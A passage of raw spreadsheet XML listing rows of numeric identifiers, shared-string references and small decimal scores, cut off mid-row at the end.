    <row r="24728" ht="15.75" customHeight="1">
      <c r="A24728" s="1">
        <v>33641.0</v>
      </c>
      <c r="B24728" s="2">
        <v>8381166.0</v>
      </c>
      <c r="C24728" s="2" t="s">
        <v>23801</v>
      </c>
      <c r="D24728" s="2">
        <v>1.0</v>
      </c>
      <c r="E24728" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24728" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="24729" ht="15.75" customHeight="1">
      <c r="A24729" s="1">
        <v>21933.0</v>
      </c>
      <c r="B24729" s="2">
        <v>2.8628765E7</v>
      </c>
      <c r="C24729" s="2" t="s">
        <v>23802</v>
      </c>
      <c r="D24729" s="2">
        <v>1.0</v>
      </c>
      <c r="E24729" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24729" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="24730" ht="15.75" customHeight="1">
      <c r="A24730" s="1">
        <v>22201.0</v>
      </c>
      <c r="B24730" s="2">
        <v>3.1975142E7</v>
      </c>
      <c r="C24730" s="2" t="s">
        <v>23299</v>
      </c>
      <c r="D24730" s="2">
        <v>1.0</v>
      </c>
      <c r="E24730" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24730" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="24731" ht="15.75" customHeight="1">
      <c r="A24731" s="1">
        <v>29316.0</v>
      </c>
      <c r="B24731" s="2">
        <v>3.131045E7</v>
      </c>
      <c r="C24731" s="2" t="s">
        <v>23542</v>
      </c>
      <c r="D24731" s="2">
        <v>1.0</v>
      </c>
      <c r="E24731" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24731" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="24732" ht="15.75" customHeight="1">
      <c r="A24732" s="1">
        <v>459.0</v>
      </c>
      <c r="B24732" s="2">
        <v>1.7262109E7</v>
      </c>
      <c r="C24732" s="2" t="s">
        <v>23803</v>
      </c>
      <c r="D24732" s="2">
        <v>1.0</v>
      </c>
      <c r="E24732" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24732" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="24733" ht="15.75" customHeight="1">
      <c r="A24733" s="1">
        <v>28043.0</v>
      </c>
      <c r="B24733" s="2">
        <v>2.4538133E7</v>
      </c>
      <c r="C24733" s="2" t="s">
        <v>23804</v>
      </c>
      <c r="D24733" s="2">
        <v>1.0</v>
      </c>
      <c r="E24733" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24733" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="24734" ht="15.75" customHeight="1">
      <c r="A24734" s="1">
        <v>27358.0</v>
      </c>
      <c r="B24734" s="2">
        <v>2.1618618E7</v>
      </c>
      <c r="C24734" s="2" t="s">
        <v>23805</v>
      </c>
      <c r="D24734" s="2">
        <v>1.0</v>
      </c>
      <c r="E24734" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24734" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="24735" ht="15.75" customHeight="1">
      <c r="A24735" s="1">
        <v>23245.0</v>
      </c>
      <c r="B24735" s="2">
        <v>5.3046947E7</v>
      </c>
      <c r="C24735" s="2" t="s">
        <v>23806</v>
      </c>
      <c r="D24735" s="2">
        <v>1.0</v>
      </c>
      <c r="E24735" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24735" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="24736" ht="15.75" customHeight="1">
      <c r="A24736" s="1">
        <v>1179.0</v>
      </c>
      <c r="B24736" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C24736" s="2" t="s">
        <v>23807</v>
      </c>
      <c r="D24736" s="2">
        <v>1.0</v>
      </c>
      <c r="E24736" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24736" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="24737" ht="15.75" customHeight="1">
      <c r="A24737" s="1">
        <v>26738.0</v>
      </c>
      <c r="B24737" s="2">
        <v>1.8284166E7</v>
      </c>
      <c r="C24737" s="2" t="s">
        <v>23808</v>
      </c>
      <c r="D24737" s="2">
        <v>1.0</v>
      </c>
      <c r="E24737" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24737" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="24738" ht="15.75" customHeight="1">
      <c r="A24738" s="1">
        <v>5385.0</v>
      </c>
      <c r="B24738" s="2">
        <v>4.5419559E7</v>
      </c>
      <c r="C24738" s="2" t="s">
        <v>23809</v>
      </c>
      <c r="D24738" s="2">
        <v>1.0</v>
      </c>
      <c r="E24738" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24738" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="24739" ht="15.75" customHeight="1">
      <c r="A24739" s="1">
        <v>640.0</v>
      </c>
      <c r="B24739" s="2">
        <v>1.9829203E7</v>
      </c>
      <c r="C24739" s="2" t="s">
        <v>23810</v>
      </c>
      <c r="D24739" s="2">
        <v>1.0</v>
      </c>
      <c r="E24739" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24739" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="24740" ht="15.75" customHeight="1">
      <c r="A24740" s="1">
        <v>23755.0</v>
      </c>
      <c r="B24740" s="2">
        <v>7473133.0</v>
      </c>
      <c r="C24740" s="2" t="s">
        <v>23811</v>
      </c>
      <c r="D24740" s="2">
        <v>1.0</v>
      </c>
      <c r="E24740" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24740" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="24741" ht="15.75" customHeight="1">
      <c r="A24741" s="1">
        <v>25365.0</v>
      </c>
      <c r="B24741" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C24741" s="2" t="s">
        <v>23812</v>
      </c>
      <c r="D24741" s="2">
        <v>1.0</v>
      </c>
      <c r="E24741" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24741" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="24742" ht="15.75" customHeight="1">
      <c r="A24742" s="1">
        <v>30171.0</v>
      </c>
      <c r="B24742" s="2">
        <v>3.7127496E7</v>
      </c>
      <c r="C24742" s="2" t="s">
        <v>23813</v>
      </c>
      <c r="D24742" s="2">
        <v>1.0</v>
      </c>
      <c r="E24742" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24742" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="24743" ht="15.75" customHeight="1">
      <c r="A24743" s="1">
        <v>32246.0</v>
      </c>
      <c r="B24743" s="2">
        <v>5506712.0</v>
      </c>
      <c r="C24743" s="2" t="s">
        <v>23814</v>
      </c>
      <c r="D24743" s="2">
        <v>1.0</v>
      </c>
      <c r="E24743" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24743" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="24744" ht="15.75" customHeight="1">
      <c r="A24744" s="1">
        <v>379.0</v>
      </c>
      <c r="B24744" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C24744" s="2" t="s">
        <v>23815</v>
      </c>
      <c r="D24744" s="2">
        <v>1.0</v>
      </c>
      <c r="E24744" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24744" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24745" ht="15.75" customHeight="1">
      <c r="A24745" s="1">
        <v>2494.0</v>
      </c>
      <c r="B24745" s="2">
        <v>3.3892762E7</v>
      </c>
      <c r="C24745" s="2" t="s">
        <v>23816</v>
      </c>
      <c r="D24745" s="2">
        <v>1.0</v>
      </c>
      <c r="E24745" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24745" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24746" ht="15.75" customHeight="1">
      <c r="A24746" s="1">
        <v>3748.0</v>
      </c>
      <c r="B24746" s="2">
        <v>3.9693649E7</v>
      </c>
      <c r="C24746" s="2" t="s">
        <v>23817</v>
      </c>
      <c r="D24746" s="2">
        <v>1.0</v>
      </c>
      <c r="E24746" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24746" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24747" ht="15.75" customHeight="1">
      <c r="A24747" s="1">
        <v>4259.0</v>
      </c>
      <c r="B24747" s="2">
        <v>4.1828799E7</v>
      </c>
      <c r="C24747" s="2" t="s">
        <v>23818</v>
      </c>
      <c r="D24747" s="2">
        <v>1.0</v>
      </c>
      <c r="E24747" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24747" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24748" ht="15.75" customHeight="1">
      <c r="A24748" s="1">
        <v>7590.0</v>
      </c>
      <c r="B24748" s="2">
        <v>5.1602911E7</v>
      </c>
      <c r="C24748" s="2" t="s">
        <v>23819</v>
      </c>
      <c r="D24748" s="2">
        <v>1.0</v>
      </c>
      <c r="E24748" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24748" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24749" ht="15.75" customHeight="1">
      <c r="A24749" s="1">
        <v>8961.0</v>
      </c>
      <c r="B24749" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C24749" s="5" t="s">
        <v>23820</v>
      </c>
      <c r="D24749" s="2">
        <v>1.0</v>
      </c>
      <c r="E24749" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24749" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24750" ht="15.75" customHeight="1">
      <c r="A24750" s="1">
        <v>11194.0</v>
      </c>
      <c r="B24750" s="2">
        <v>1.9868223E7</v>
      </c>
      <c r="C24750" s="2" t="s">
        <v>23821</v>
      </c>
      <c r="D24750" s="2">
        <v>1.0</v>
      </c>
      <c r="E24750" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24750" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24751" ht="15.75" customHeight="1">
      <c r="A24751" s="1">
        <v>11374.0</v>
      </c>
      <c r="B24751" s="2">
        <v>2.1416588E7</v>
      </c>
      <c r="C24751" s="2" t="s">
        <v>23822</v>
      </c>
      <c r="D24751" s="2">
        <v>1.0</v>
      </c>
      <c r="E24751" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24751" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24752" ht="15.75" customHeight="1">
      <c r="A24752" s="1">
        <v>11830.0</v>
      </c>
      <c r="B24752" s="2">
        <v>2.4668376E7</v>
      </c>
      <c r="C24752" s="2" t="s">
        <v>23823</v>
      </c>
      <c r="D24752" s="2">
        <v>1.0</v>
      </c>
      <c r="E24752" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24752" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24753" ht="15.75" customHeight="1">
      <c r="A24753" s="1">
        <v>14749.0</v>
      </c>
      <c r="B24753" s="2">
        <v>4.074847E7</v>
      </c>
      <c r="C24753" s="2" t="s">
        <v>23824</v>
      </c>
      <c r="D24753" s="2">
        <v>1.0</v>
      </c>
      <c r="E24753" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24753" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24754" ht="15.75" customHeight="1">
      <c r="A24754" s="1">
        <v>15755.0</v>
      </c>
      <c r="B24754" s="2">
        <v>4.4140761E7</v>
      </c>
      <c r="C24754" s="2" t="s">
        <v>23825</v>
      </c>
      <c r="D24754" s="2">
        <v>1.0</v>
      </c>
      <c r="E24754" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24754" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24755" ht="15.75" customHeight="1">
      <c r="A24755" s="1">
        <v>19313.0</v>
      </c>
      <c r="B24755" s="2">
        <v>5.5285853E7</v>
      </c>
      <c r="C24755" s="2" t="s">
        <v>23826</v>
      </c>
      <c r="D24755" s="2">
        <v>1.0</v>
      </c>
      <c r="E24755" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24755" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24756" ht="15.75" customHeight="1">
      <c r="A24756" s="1">
        <v>19846.0</v>
      </c>
      <c r="B24756" s="2">
        <v>5.7086415E7</v>
      </c>
      <c r="C24756" s="2" t="s">
        <v>23827</v>
      </c>
      <c r="D24756" s="2">
        <v>1.0</v>
      </c>
      <c r="E24756" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24756" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24757" ht="15.75" customHeight="1">
      <c r="A24757" s="1">
        <v>20330.0</v>
      </c>
      <c r="B24757" s="2">
        <v>1.1506176E7</v>
      </c>
      <c r="C24757" s="2" t="s">
        <v>23828</v>
      </c>
      <c r="D24757" s="2">
        <v>1.0</v>
      </c>
      <c r="E24757" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24757" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24758" ht="15.75" customHeight="1">
      <c r="A24758" s="1">
        <v>20928.0</v>
      </c>
      <c r="B24758" s="2">
        <v>1.6416937E7</v>
      </c>
      <c r="C24758" s="2" t="s">
        <v>23829</v>
      </c>
      <c r="D24758" s="2">
        <v>1.0</v>
      </c>
      <c r="E24758" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24758" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24759" ht="15.75" customHeight="1">
      <c r="A24759" s="1">
        <v>21313.0</v>
      </c>
      <c r="B24759" s="2">
        <v>2.082071E7</v>
      </c>
      <c r="C24759" s="2" t="s">
        <v>23830</v>
      </c>
      <c r="D24759" s="2">
        <v>1.0</v>
      </c>
      <c r="E24759" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24759" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24760" ht="15.75" customHeight="1">
      <c r="A24760" s="1">
        <v>21411.0</v>
      </c>
      <c r="B24760" s="2">
        <v>2.1981499E7</v>
      </c>
      <c r="C24760" s="2" t="s">
        <v>23831</v>
      </c>
      <c r="D24760" s="2">
        <v>1.0</v>
      </c>
      <c r="E24760" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24760" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24761" ht="15.75" customHeight="1">
      <c r="A24761" s="1">
        <v>22079.0</v>
      </c>
      <c r="B24761" s="2">
        <v>3.0660796E7</v>
      </c>
      <c r="C24761" s="2" t="s">
        <v>23832</v>
      </c>
      <c r="D24761" s="2">
        <v>1.0</v>
      </c>
      <c r="E24761" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24761" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24762" ht="15.75" customHeight="1">
      <c r="A24762" s="1">
        <v>23189.0</v>
      </c>
      <c r="B24762" s="2">
        <v>5.2342306E7</v>
      </c>
      <c r="C24762" s="2" t="s">
        <v>23833</v>
      </c>
      <c r="D24762" s="2">
        <v>1.0</v>
      </c>
      <c r="E24762" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24762" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24763" ht="15.75" customHeight="1">
      <c r="A24763" s="1">
        <v>25300.0</v>
      </c>
      <c r="B24763" s="2">
        <v>1.3412726E7</v>
      </c>
      <c r="C24763" s="2" t="s">
        <v>23834</v>
      </c>
      <c r="D24763" s="2">
        <v>1.0</v>
      </c>
      <c r="E24763" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24763" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24764" ht="15.75" customHeight="1">
      <c r="A24764" s="1">
        <v>26414.0</v>
      </c>
      <c r="B24764" s="2">
        <v>1.7141075E7</v>
      </c>
      <c r="C24764" s="2" t="s">
        <v>23835</v>
      </c>
      <c r="D24764" s="2">
        <v>1.0</v>
      </c>
      <c r="E24764" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24764" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24765" ht="15.75" customHeight="1">
      <c r="A24765" s="1">
        <v>26602.0</v>
      </c>
      <c r="B24765" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C24765" s="2" t="s">
        <v>23836</v>
      </c>
      <c r="D24765" s="2">
        <v>1.0</v>
      </c>
      <c r="E24765" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24765" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24766" ht="15.75" customHeight="1">
      <c r="A24766" s="1">
        <v>27233.0</v>
      </c>
      <c r="B24766" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C24766" s="2" t="s">
        <v>23837</v>
      </c>
      <c r="D24766" s="2">
        <v>1.0</v>
      </c>
      <c r="E24766" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24766" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24767" ht="15.75" customHeight="1">
      <c r="A24767" s="1">
        <v>27446.0</v>
      </c>
      <c r="B24767" s="2">
        <v>2.1985013E7</v>
      </c>
      <c r="C24767" s="2" t="s">
        <v>23838</v>
      </c>
      <c r="D24767" s="2">
        <v>1.0</v>
      </c>
      <c r="E24767" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24767" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24768" ht="15.75" customHeight="1">
      <c r="A24768" s="1">
        <v>27519.0</v>
      </c>
      <c r="B24768" s="2">
        <v>2.2167347E7</v>
      </c>
      <c r="C24768" s="2" t="s">
        <v>23839</v>
      </c>
      <c r="D24768" s="2">
        <v>1.0</v>
      </c>
      <c r="E24768" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24768" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24769" ht="15.75" customHeight="1">
      <c r="A24769" s="1">
        <v>27576.0</v>
      </c>
      <c r="B24769" s="2">
        <v>2.2451976E7</v>
      </c>
      <c r="C24769" s="2" t="s">
        <v>23840</v>
      </c>
      <c r="D24769" s="2">
        <v>1.0</v>
      </c>
      <c r="E24769" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24769" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24770" ht="15.75" customHeight="1">
      <c r="A24770" s="1">
        <v>27638.0</v>
      </c>
      <c r="B24770" s="2">
        <v>2.2739466E7</v>
      </c>
      <c r="C24770" s="2" t="s">
        <v>23841</v>
      </c>
      <c r="D24770" s="2">
        <v>1.0</v>
      </c>
      <c r="E24770" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24770" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24771" ht="15.75" customHeight="1">
      <c r="A24771" s="1">
        <v>28376.0</v>
      </c>
      <c r="B24771" s="2">
        <v>2.6105639E7</v>
      </c>
      <c r="C24771" s="2" t="s">
        <v>23842</v>
      </c>
      <c r="D24771" s="2">
        <v>1.0</v>
      </c>
      <c r="E24771" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24771" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24772" ht="15.75" customHeight="1">
      <c r="A24772" s="1">
        <v>29732.0</v>
      </c>
      <c r="B24772" s="2">
        <v>3.4565989E7</v>
      </c>
      <c r="C24772" s="2" t="s">
        <v>23843</v>
      </c>
      <c r="D24772" s="2">
        <v>1.0</v>
      </c>
      <c r="E24772" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24772" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24773" ht="15.75" customHeight="1">
      <c r="A24773" s="1">
        <v>30357.0</v>
      </c>
      <c r="B24773" s="2">
        <v>3.8276001E7</v>
      </c>
      <c r="C24773" s="2" t="s">
        <v>23844</v>
      </c>
      <c r="D24773" s="2">
        <v>1.0</v>
      </c>
      <c r="E24773" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24773" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24774" ht="15.75" customHeight="1">
      <c r="A24774" s="1">
        <v>30601.0</v>
      </c>
      <c r="B24774" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C24774" s="2" t="s">
        <v>23845</v>
      </c>
      <c r="D24774" s="2">
        <v>1.0</v>
      </c>
      <c r="E24774" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24774" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24775" ht="15.75" customHeight="1">
      <c r="A24775" s="1">
        <v>31301.0</v>
      </c>
      <c r="B24775" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C24775" s="2" t="s">
        <v>23846</v>
      </c>
      <c r="D24775" s="2">
        <v>1.0</v>
      </c>
      <c r="E24775" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24775" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24776" ht="15.75" customHeight="1">
      <c r="A24776" s="1">
        <v>31413.0</v>
      </c>
      <c r="B24776" s="2">
        <v>5008438.0</v>
      </c>
      <c r="C24776" s="2" t="s">
        <v>23844</v>
      </c>
      <c r="D24776" s="2">
        <v>1.0</v>
      </c>
      <c r="E24776" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24776" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24777" ht="15.75" customHeight="1">
      <c r="A24777" s="1">
        <v>32008.0</v>
      </c>
      <c r="B24777" s="2">
        <v>5.3453089E7</v>
      </c>
      <c r="C24777" s="2" t="s">
        <v>23847</v>
      </c>
      <c r="D24777" s="2">
        <v>1.0</v>
      </c>
      <c r="E24777" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24777" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24778" ht="15.75" customHeight="1">
      <c r="A24778" s="1">
        <v>32014.0</v>
      </c>
      <c r="B24778" s="2">
        <v>5.3488065E7</v>
      </c>
      <c r="C24778" s="2" t="s">
        <v>23847</v>
      </c>
      <c r="D24778" s="2">
        <v>1.0</v>
      </c>
      <c r="E24778" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24778" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24779" ht="15.75" customHeight="1">
      <c r="A24779" s="1">
        <v>32692.0</v>
      </c>
      <c r="B24779" s="2">
        <v>5953811.0</v>
      </c>
      <c r="C24779" s="2" t="s">
        <v>23848</v>
      </c>
      <c r="D24779" s="2">
        <v>1.0</v>
      </c>
      <c r="E24779" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24779" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24780" ht="15.75" customHeight="1">
      <c r="A24780" s="1">
        <v>33223.0</v>
      </c>
      <c r="B24780" s="2">
        <v>7262721.0</v>
      </c>
      <c r="C24780" s="2" t="s">
        <v>23849</v>
      </c>
      <c r="D24780" s="2">
        <v>1.0</v>
      </c>
      <c r="E24780" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24780" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24781" ht="15.75" customHeight="1">
      <c r="A24781" s="1">
        <v>34108.0</v>
      </c>
      <c r="B24781" s="2">
        <v>9717071.0</v>
      </c>
      <c r="C24781" s="2" t="s">
        <v>23850</v>
      </c>
      <c r="D24781" s="2">
        <v>1.0</v>
      </c>
      <c r="E24781" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24781" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="24782" ht="15.75" customHeight="1">
      <c r="A24782" s="1">
        <v>3360.0</v>
      </c>
      <c r="B24782" s="2">
        <v>3.7855275E7</v>
      </c>
      <c r="C24782" s="2" t="s">
        <v>23851</v>
      </c>
      <c r="D24782" s="2">
        <v>1.0</v>
      </c>
      <c r="E24782" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24782" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="24783" ht="15.75" customHeight="1">
      <c r="A24783" s="1">
        <v>21366.0</v>
      </c>
      <c r="B24783" s="2">
        <v>2.1474313E7</v>
      </c>
      <c r="C24783" s="2" t="s">
        <v>23852</v>
      </c>
      <c r="D24783" s="2">
        <v>1.0</v>
      </c>
      <c r="E24783" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24783" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="24784" ht="15.75" customHeight="1">
      <c r="A24784" s="1">
        <v>27347.0</v>
      </c>
      <c r="B24784" s="2">
        <v>2.1474312E7</v>
      </c>
      <c r="C24784" s="2" t="s">
        <v>23852</v>
      </c>
      <c r="D24784" s="2">
        <v>1.0</v>
      </c>
      <c r="E24784" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24784" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="24785" ht="15.75" customHeight="1">
      <c r="A24785" s="1">
        <v>29897.0</v>
      </c>
      <c r="B24785" s="2">
        <v>3607017.0</v>
      </c>
      <c r="C24785" s="2" t="s">
        <v>23853</v>
      </c>
      <c r="D24785" s="2">
        <v>1.0</v>
      </c>
      <c r="E24785" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24785" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="24786" ht="15.75" customHeight="1">
      <c r="A24786" s="1">
        <v>7681.0</v>
      </c>
      <c r="B24786" s="2">
        <v>5.1923942E7</v>
      </c>
      <c r="C24786" s="2" t="s">
        <v>23854</v>
      </c>
      <c r="D24786" s="2">
        <v>1.0</v>
      </c>
      <c r="E24786" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24786" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24787" ht="15.75" customHeight="1">
      <c r="A24787" s="1">
        <v>16250.0</v>
      </c>
      <c r="B24787" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C24787" s="2" t="s">
        <v>23855</v>
      </c>
      <c r="D24787" s="2">
        <v>1.0</v>
      </c>
      <c r="E24787" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24787" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24788" ht="15.75" customHeight="1">
      <c r="A24788" s="1">
        <v>21349.0</v>
      </c>
      <c r="B24788" s="2">
        <v>2.1289485E7</v>
      </c>
      <c r="C24788" s="2" t="s">
        <v>23856</v>
      </c>
      <c r="D24788" s="2">
        <v>1.0</v>
      </c>
      <c r="E24788" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24788" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24789" ht="15.75" customHeight="1">
      <c r="A24789" s="1">
        <v>23483.0</v>
      </c>
      <c r="B24789" s="2">
        <v>5731184.0</v>
      </c>
      <c r="C24789" s="2" t="s">
        <v>23857</v>
      </c>
      <c r="D24789" s="2">
        <v>1.0</v>
      </c>
      <c r="E24789" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24789" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24790" ht="15.75" customHeight="1">
      <c r="A24790" s="1">
        <v>23660.0</v>
      </c>
      <c r="B24790" s="2">
        <v>6830464.0</v>
      </c>
      <c r="C24790" s="2" t="s">
        <v>23858</v>
      </c>
      <c r="D24790" s="2">
        <v>1.0</v>
      </c>
      <c r="E24790" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24790" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24791" ht="15.75" customHeight="1">
      <c r="A24791" s="1">
        <v>27670.0</v>
      </c>
      <c r="B24791" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C24791" s="2" t="s">
        <v>23859</v>
      </c>
      <c r="D24791" s="2">
        <v>1.0</v>
      </c>
      <c r="E24791" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24791" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24792" ht="15.75" customHeight="1">
      <c r="A24792" s="1">
        <v>28896.0</v>
      </c>
      <c r="B24792" s="2">
        <v>2.9298861E7</v>
      </c>
      <c r="C24792" s="2" t="s">
        <v>23860</v>
      </c>
      <c r="D24792" s="2">
        <v>1.0</v>
      </c>
      <c r="E24792" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24792" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24793" ht="15.75" customHeight="1">
      <c r="A24793" s="1">
        <v>29098.0</v>
      </c>
      <c r="B24793" s="2">
        <v>3.0392336E7</v>
      </c>
      <c r="C24793" s="2" t="s">
        <v>23861</v>
      </c>
      <c r="D24793" s="2">
        <v>1.0</v>
      </c>
      <c r="E24793" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24793" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24794" ht="15.75" customHeight="1">
      <c r="A24794" s="1">
        <v>29665.0</v>
      </c>
      <c r="B24794" s="2">
        <v>3.3952722E7</v>
      </c>
      <c r="C24794" s="2" t="s">
        <v>23862</v>
      </c>
      <c r="D24794" s="2">
        <v>1.0</v>
      </c>
      <c r="E24794" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24794" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="24795" ht="15.75" customHeight="1">
      <c r="A24795" s="1">
        <v>30393.0</v>
      </c>
